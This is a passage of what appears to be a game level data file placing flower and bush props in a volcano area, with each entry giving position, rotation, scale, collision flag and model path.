353.858, 49.87),'Scale': VBase3(2.217, 2.217, 2.217),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618343.48akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-360.542, 398.487, 45.291),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618347.52akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-329.065, 372.58, 46.943),'Scale': VBase3(1.514, 1.514, 1.514),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618349.61akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(9.723, 0.0, 0.0),'Pos': Point3(-330.041, 415.985, 44.301),'Scale': VBase3(1.443, 1.443, 1.443),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618365.23akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-218.137, 493.894, 47.945),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618369.14akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-331.378, 482.608, 37.645),'Scale': VBase3(1.831, 1.831, 1.831),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618372.66akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-160.895, 573.245, 26.374),'Scale': VBase3(1.265, 1.265, 1.265),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618376.08akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-294.927, 651.972, 16.223),'Scale': VBase3(1.999, 1.999, 1.999),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618377.05akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-257.499, 672.428, 14.157),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618378.0akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-236.383, 690.466, 11.115),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618381.27akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-160.538, 0.0, 0.0),'Pos': Point3(-192.024, 565.858, 26.658),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618383.83akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-23.181, 562.394, 19.609),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618386.52akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(15.057, 0.0, 0.0),'Pos': Point3(29.384, 531.81, 17.45),'Scale': VBase3(2.627, 2.627, 2.627),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618387.81akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-52.525, 515.323, 25.541),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618392.2akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(103.706, 596.441, 17.132),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618393.28akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(143.132, 611.951, 17.32),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618395.11akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(177.778, 603.653, 17.694),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618396.98akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(321.009, 685.127, 19.415),'Scale': VBase3(1.541, 1.541, 1.541),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618397.95akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(326.312, 688.396, 15.912),'Scale': VBase3(1.392, 1.392, 1.392),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618398.98akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(283.054, 671.349, 17.998),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618402.16akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-26.774, 0.0, 0.0),'Pos': Point3(239.133, 597.734, 25.138),'Scale': VBase3(1.47, 1.47, 1.47),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618403.91akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(215.944, 579.828, 25.295),'Scale': VBase3(1.466, 1.466, 1.466),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618444.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(422.945, -98.913, 14.587),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618513.06akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(135.455, -199.702, 58.394),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618514.72akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(180.71, -179.011, 52.939),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618686.73akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-311.185, -333.025, 127.66),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618693.25akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(123.797, 0.0, 0.0),'Pos': Point3(-307.019, -333.72, 127.593),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618761.7akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-203.709, -137.977, 106.756),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618905.52akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-364.133, 43.128, 67.953),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618979.11akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(17.057, 0.0, 0.0),'Pos': Point3(-476.986, 46.571, 74.525),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273619007.45akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-137.365, 0.0, 0.0),'Pos': Point3(-449.255, 48.677, 72.608),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273619047.55akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-441.128, -6.623, 73.007),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273619102.73akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-137.365, 0.0, 0.0),'Pos': Point3(-451.52, 29.021, 72.721),'Scale': VBase3(1.852, 1.852, 1.852),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273619126.22akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-444.282, 9.556, 72.858),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273619158.52akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-103.532, 0.0, 0.0),'Pos': Point3(-415.852, 70.815, 71.198),'Scale': VBase3(1.765, 1.765, 1.765),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273619346.64akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-825.368, 156.938, 43.081),'Holiday': '','Hpr': VBase3(80.179, 0.0, 0.0),'Pos': Point3(-810.125, 136.299, 43.081),'Scale': VBase3(1.946, 1.946, 1.741),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273620157.05akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(237.056, 579.661, 25.17),'Scale': VBase3(1.112, 1.112, 1.112),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273620315.03akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-30.521, 0.0, 0.0),'Pos': Point3(-391.934, 44.303, 71.541),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273620598.95akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(426.241, -94.92, 13.703),'Scale': VBase3(2.283, 2.283, 2.283),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620603.47akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(388.249, -75.752, 13.632),'Scale': VBase3(2.167, 2.167, 2.167),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620611.52akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(255.429, -125.341, 36.099),'Scale': VBase3(2.261, 2.261, 2.261),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620618.66akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(126.296, -185.197, 56.934),'Scale': VBase3(1.86, 1.86, 1.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620621.63akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(136.57, -201.217, 59.127),'Scale': VBase3(1.983, 1.983, 1.983),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620626.34akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(88.849, -119.957, 63.239),'Scale': VBase3(2.281, 2.281, 2.281),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620630.56akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(129.539, 0.0, 0.0),'Pos': Point3(19.8, -157.402, 90.844),'Scale': VBase3(2.456, 2.456, 2.456),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620634.73akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(5.605, -74.699, 91.008),'Scale': VBase3(2.714, 2.714, 2.714),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620640.63akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-114.667, -114.099, 103.218),'Scale': VBase3(1.898, 1.898, 1.898),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620656.94akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-80.795, -197.734, 109.73),'Scale': VBase3(1.824, 1.824, 1.824),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620659.98akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-105.078, -214.022, 108.741),'Scale': VBase3(1.705, 1.705, 1.705),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620665.97akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(55.778, 0.0, 0.0),'Pos': Point3(-166.925, -256.805, 109.542),'Scale': VBase3(1.769, 1.769, 1.769),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620669.09akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-223.13, -278.25, 113.054),'Scale': VBase3(1.692, 1.692, 1.692),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620672.67akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-203.132, -177.845, 108.555),'Scale': VBase3(1.745, 1.745, 1.745),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620677.44akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(20.783, 0.0, 0.0),'Pos': Point3(-268.584, -268.242, 117.387),'Scale': VBase3(2.219, 2.219, 2.219),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620682.63akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-306.456, -278.017, 120.313),'Scale': VBase3(2.986, 2.986, 2.986),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620688.64akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-365.517, -325.527, 120.002),'Scale': VBase3(1.924, 1.924, 1.924),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620692.56akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-308.387, -330.941, 127.619),'Scale': VBase3(2.14, 2.14, 2.14),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620702.75akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-313.208, -198.079, 111.069),'Scale': VBase3(2.088, 2.088, 2.088),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620705.88akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-322.224, -171.344, 108.144),'Scale': VBase3(2.361, 2.361, 2.361),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620709.64akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-298.874, -142.428, 107.642),'Scale': VBase3(1.616, 1.616, 1.616),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620713.89akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-204.136, -132.062, 106.618),'Scale': VBase3(1.48, 1.48, 1.48),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620720.83akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-187.277, -96.786, 106.586),'Scale': VBase3(2.721, 2.721, 2.721),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620724.8akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-159.974, -26.898, 105.409),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620734.59akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-259.111, 58.306, 64.865),'Scale': VBase3(1.671, 1.671, 1.671),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620743.03akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-262.617, 161.265, 65.686),'Scale': VBase3(1.461, 1.461, 1.461),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620751.28akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-352.014, 49.097, 66.609),'Scale': VBase3(2.187, 2.187, 2.187),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620758.86akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-444.333, 19.088, 72.807),'Scale': VBase3(1.971, 1.971, 1.971),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620762.03akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-406.664, 13.092, 72.164),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620766.06akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(52.414, 0.0, 0.0),'Pos': Point3(-420.963, 65.071, 71.83),'Scale': VBase3(1.86, 1.86, 1.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620772.64akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-450.048, 6.82, 72.822),'Scale': VBase3(1.161, 1.161, 1.161),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620775.31akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-477.285, 30.66, 73.914),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620777.73akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-451.714, -6.598, 72.899),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620787.44akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-433.415, 91.785, 70.082),'Scale': VBase3(1.317, 1.317, 1.317),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620791.5akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-487.187, 95.366, 72.252),'Scale': VBase3(1.658, 1.658, 1.658),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620797.59akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-576.54, 95.093, 72.566),'Scale': VBase3(2.157, 2.157, 2.157),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620801.52akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(67.427, 0.0, 0.0),'Pos': Point3(-659.008, 67.234, 66.11),'Scale': VBase3(3.578, 3.578, 3.578),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620805.95akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(157.661, 0.0, 0.0),'Pos': Point3(-681.14, 167.573, 57.095),'Scale': VBase3(2.445, 2.445, 2.445),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620829.78akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-611.407, 300.71, 63.11),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620834.02akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-489.717, 346.313, 53.453),'Scale': VBase3(2.387, 2.387, 2.387),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620838.81akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(94.218, 0.0, 0.0),'Pos': Point3(-516.884, 441.594, 39.257),'Scale': VBase3(2.409, 2.409, 2.409),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620841.69akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-500.995, 448.93, 39.705),'Scale': VBase3(1.716, 1.716, 1.716),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620847.56akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-436.523, 351.488, 49.855),'Scale': VBase3(1.66, 1.66, 1.66),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620849.91akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-383.726, 386.226, 44.652),'Scale': VBase3(2.204, 2.204, 2.204),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620856.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-310.283, 446.307, 42.41),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620875.95akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-312.948, 390.778, 46.787),'Scale': VBase3(2.139, 2.139, 2.139),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620880.69akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-269.085, 402.314, 47.326),'Scale': VBase3(1.702, 1.702, 1.702),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620883.53akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-279.393, 379.762, 50.41),'Scale': VBase3(1.523, 1.523, 1.523),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620888.42akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-242.528, 463.478, 45.622),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620896.14akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-228.665, 483.403, 47.665),'Scale': VBase3(1.665, 1.665, 1.665),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620901.55akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-293.988, 603.245, 22.945),'Scale': VBase3(2.502, 2.502, 2.502),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620906.09akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-295.999, 646.253, 17.802),'Scale': VBase3(2.098, 2.098, 2.098),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620910.08akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-238.345, 690.586, 11.139),'Scale': VBase3(2.861, 2.861, 2.861),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620916.48akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-190.924, 712.447, 1.722),'Scale': VBase3(1.207, 1.207, 1.207),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620923.53akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-122.813, 603.535, 22.122),'Scale': VBase3(1.84, 1.84, 1.84),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620981.88akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(101.749, 603.353, 16.722),'Scale': VBase3(3.429, 3.429, 3.429),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620989.84akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 